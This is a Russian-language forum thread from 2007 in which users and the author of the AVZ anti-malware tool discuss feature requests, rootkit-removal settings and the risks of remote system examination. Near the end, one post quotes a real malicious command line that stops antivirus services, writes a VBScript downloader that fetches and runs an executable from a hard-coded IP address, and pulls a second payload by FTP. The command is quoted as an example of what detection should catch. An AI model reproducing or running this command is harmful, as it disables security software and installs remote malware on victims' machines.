Олег, с Geeks To Go пришел первый фичреквест. Хотят интерактивные элементы для генерации скриптов во всех логах (т.е. не только в исследовании системы, но и в логах, сохраняемых из отдельных диспетчеров).
В теории это возможно, только нужно ли ?! В исследовании системы можно генерировать лог с любым набором данных, сохранение протокола из каждого менеджера - это пережиток старых версий, где не было исследования системы.
Будь в курсе!Будь в курсе!
Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:
Мотивируют тем, что в ряде случаев им достаточно запросить лог одного диспетчера и не прогонять полностью все исследование системы. Я, кстати, тоже иногда прошу лог конкретного менеджера.
[I]Nick Golovko
NCFU lecturer, information security specialist[/I]
Проявилась еще одна проблема, Win XP Home SP2 Rus:
9. Мастер поиска и устранения проблем
>> Нарушение ассоциации REG файлов
Ассоциация с виду в порядке, если надо, могу скинуть соответствующие ветки реестра.
И два предложения:
1. Писать в программе полную версию билда, а не просто 4.29
2. Распространять дистрибутив через торренты, если агава не справляется. Все же лучше, чем рапидшара =)
Кажется мой вопрос остался без ответа Почему при выполнении скрипта №3 AVZ запрещено настройкой удалять руткиты?
Не запрещено, а не разрешено. Если перед выполнением скриптов это разрешить в настройке, то они удаляться. Так было исторически, руткит относится к категории HackTool (равно как эксплоиты, hacktools и т.п.)
2. Распространять дистрибутив через торренты, если агава не справляется. Все же лучше, чем рапидшара =)
Можно сделать зеркало у нас.
Добавлено через 2 минуты
Сообщение от Зайцев Олег
Не запрещено, а не разрешено. Если перед выполнением скриптов это разрешить в настройке, то они удаляться. Так было исторически, руткит относится к категории HackTool (равно как эксплоиты, hacktools и т.п.)
Может забыть историю и перенести руткиты в другую категорию? Жалко хелперов, зачем вручную удалять то, что AVZ не плохо почистит сам на автоматике во время сбора логов?
Последний раз редактировалось Макcим; 16.12.2007 в 00:04.
Причина: Добавлено
...В исследовании системы можно генерировать лог с любым набором данных, сохранение протокола из каждого менеджера - это пережиток старых версий, где не было исследования системы.
Олег, реально с помощью АВЗ получить исследование удаленной системы? Выполнить анализ лога исследования и автоматически сгенерировать скрипт выполнения, который можно интерактивно поправить... т.е. иметь в составе АВЗ визард-инструмент(типа LC5), который позволяет по ip/mac адресу или путем выбора из сетевого окружения исследовать удаленную систему.
иметь в составе АВЗ визард-инструмент(типа LC5), который позволяет по ip/mac адресу или путем выбора из сетевого окружения исследовать удаленную систему.
Опосля чего остальные антивирусы запишут AVZ в зловреды?
Гм, возможности AVZ настолько широки, что очень не хотелось бы, чтобы кто-то мог удалённо управлять моей машиной.
Так что если делать - то по специальному ключу и так далее.
Опосля чего остальные антивирусы запишут AVZ в зловреды?
Гм, возможности AVZ настолько широки, что очень не хотелось бы, чтобы кто-то мог удалённо управлять моей машиной.
Так что если делать - то по специальному ключу и так далее.
Так все равно это делает юзер с помощью Gain&Abel, Ideal Administration, DameWare Utilities - правда, с админскими правами на удаленной системе.
Так все равно это делает юзер с помощью Gain&Abel, Ideal Administration, DameWare Utilities - правда, с админскими правами на удаленной системе.
Или хакер при помощи какого-нибудь трояна вроде BackOffice.
Фишка в том, что лично я иметь AVZ на своей машине хочу. А потенциальную дырку для хакера - как-то не хочется. Я лучше имеющиеся в виндах дырки прикрою.
А клиенту админские права на удалённой машине ОБЯЗАТЕЛЬНО должны быть нужны. Даже если это корпоративная сеть без инета. Иначе - НЕБЕЗОПАСНО. Уж слишком много опасного умеет делать AVZ.
Олег, реально с помощью АВЗ получить исследование удаленной системы? Выполнить анализ лога исследования и автоматически сгенерировать скрипт выполнения, который можно интерактивно поправить... т.е. иметь в составе АВЗ визард-инструмент(типа LC5), который позволяет по ip/mac адресу или путем выбора из сетевого окружения исследовать удаленную систему.
Технически я могу конечно ввести в AVZ некую фичу типа RAdmin, которая даст доступ к экрану и клавиатуре/мышке. Если рассуждать чисто гипотетически, то в случае введения этой опции она будет активироваться через меню, функционировать только на сеанс и только пока запущен AVZ, причем для активации нужно будет задавать IP "помошника", его логин, пароль. С другой стороны, сколь актуальна подобная фича ? Ее плюс конечно несомненен - хелпер в сложной ситуации сможет напрямую подключиться к ПК для лечения, минус также несомненен - по сути это "дырка" в безопасности, пусть небольшая, но дырка.
Другой путь решения - это удаленный запуск AVZ с применением скрипта, который изучит систему и пошлет логи куда сказано. Там их изучат, и будет выполнен удаленный запуск AVZ с выполнением скрипта карантина и лечения. По сути идея идентична разделу "Помогите", но с автоматическим запуском - такое применяется у меня в конторе на всех ПК.
Наконец третий вариант самый правильный - это хелпдеск, связанный с ядром AVZ. Т.е. ядро изучает систему, шлет данные хелпдеску (автоматом, через почту при помощи юзера и т.п.). Хелпдеск изучает их с помощью ИР, формирует скрипт (правильный по его мнению) и подключает хелпера. Хелпер изучает предложение ИР, вносит в случае надобности корректуры, далее скрипт идет юзеру, результат - хелпдеску и т.п. по кругу. В данном случае плюс в том, что явного удаленного управления нет, юзер может изучить скрипты и отсылаемые логи, и обмен идет не с ПК некого хелпера (который юзеру в принципе неизвестен), а с хелпдеском, размещенным у уважаемого AV вендора, выступающего в данном случае гарантом безопасности всей этой цепочки. В этой ситуации хелпдеск будет еще и защитой от "хелпера-терориста", так как блокирует явные ошибки в скриптах типа удаления легитимного ПО.
Был бы интересен такой вариант: (естественно, без удаленного управления.... потому что админ по любому сможет в лок.сети подключиться к удаленной системе и запустить АВЗ с общедоступного ресурса). админ, запускает АВЗ на СВОЕЙ машине, запускает процесс исследования на удаленной машине, получает вывод в таблицы_окна, аналогично как мы видим СВОИ процессы, службы, драйвера, автозагрузку и т.д. в менеджерах сервиса с полным анализом процессов, служб, драйверов по базе безопасных файлов АВЗ. Но, соответственно, без (а может с такой возможностью!!!) возможности kill process, добавить в карантин и т.д.. Далее, после просмотра таблицы данных админом запускается анализ и автоматическая генерация скрипта, если необходимо его выполнение.... Т.е. интересно было бы не автоматическое и периодическое сканирование системы - а, тогда, когда в этом есть необходимость, по каким то признакам заражения....
может, пути к исполняемому файлу? Тоже может procexp. А всю командную строку получить будет затруднительно, да и незачем.
AVZ в исследовании системы показывает командную строку запущенных процессов (в крайней правой колонке, в качестве примечания).
А вот отображение родительского процесса стоит сделать, это несложно
Олег, до меня кажется дошло, что он принципиально нового хочет. Грубо говоря - вычитку XML-логов в формы AVZ. Желательно - с генерацией скрипта по нажатиям кнопок в формах AVZ. Остальное - технические детали пересылки, её можно пока и почтой делать.
Насколько это реально?
Добавлено через 56 минут
Сообщение от Зайцев Олег
AVZ в исследовании системы показывает командную строку запущенных процессов (в крайней правой колонке, в качестве примечания).
Гм, а антивирусный поиск в ней сложно сделать? Я про случай, когда когда законный CMD.EXE выполняет вирусный код. В принципе AVZ может сам отловить это.
Сообщение от Зайцев Олег
А вот отображение родительского процесса стоит сделать, это несложно
СПАСИБО!
А вот и командная строчка F:\WINNT\system32\cmd.exe /c net stop "Norton AntiVirus Auto Protect Service"&net stop Mcshield&net stop "Panda Antivirus"&echo dim HTTPGET>c:\1.vbs&echo dim Data>>c:\1.vbs&echo dim ExeURL>>c:\1.vbs&echo dim LocalPath>>c:\1.vbs&echo.>>c:\1.vbs&echo ExeURL = "http://91.122.0.103:2904/84785_mssql.exe">>c:\1.vbs&echo LocalPath = "c:\windmns.exe">>c:\1.vbs&echo.>>c:\1.vbs&ech o Set HTTPGET = CreateObject("Microsoft" ^& chr(46) ^& "XMLHTTP")>>c:\1.vbs&echo Set Data = CreateObject("ADODB" ^& chr(46) ^& "Stream")>>c:\1.vbs&echo.>>c:\1.vbs&echo HTTPGET.Open "GET", ExeURL, false>>c:\1.vbs&echo HTTPGET.Send>>c:\1.vbs&echo.>>c:\1.vbs&echo Const adTypeBinary = ^1>>c:\1.vbs&echo Const adSaveCreateOverWrite = ^2>>c:\1.vbs&echo.>>c:\1.vbs&echo Data.Type = adTypeBinary>>c:\1.vbs&echo Data.Open>>c:\1.vbs&echo Data.Write HTTPGET.ResponseBody>>c:\1.vbs&echo Data.SaveToFile LocalPath, adSaveCreateOverWrite>>c:\1.vbs&cscript //Nologo /B c:\1.vbs&del c:\1.vbs&start c:\windmns.exe&echo OPEN 91.122.0.103 16467>x&echo GET 27031_mssql.exe>>x&echo QUIT>>x&FTP -n -s:x&27031_mssql.exe&del x&exit
Последний раз редактировалось Jef239; 17.12.2007 в 19:17.
Причина: Добавлено
Олег, а почему для процесса номер 8 показывается файл \WINNT\System? Более того, он запихивается в картантин, что явно не порядок.
8 - это idle process, он с файлом не связан. Так что - всегда зелёное исключение должно быть.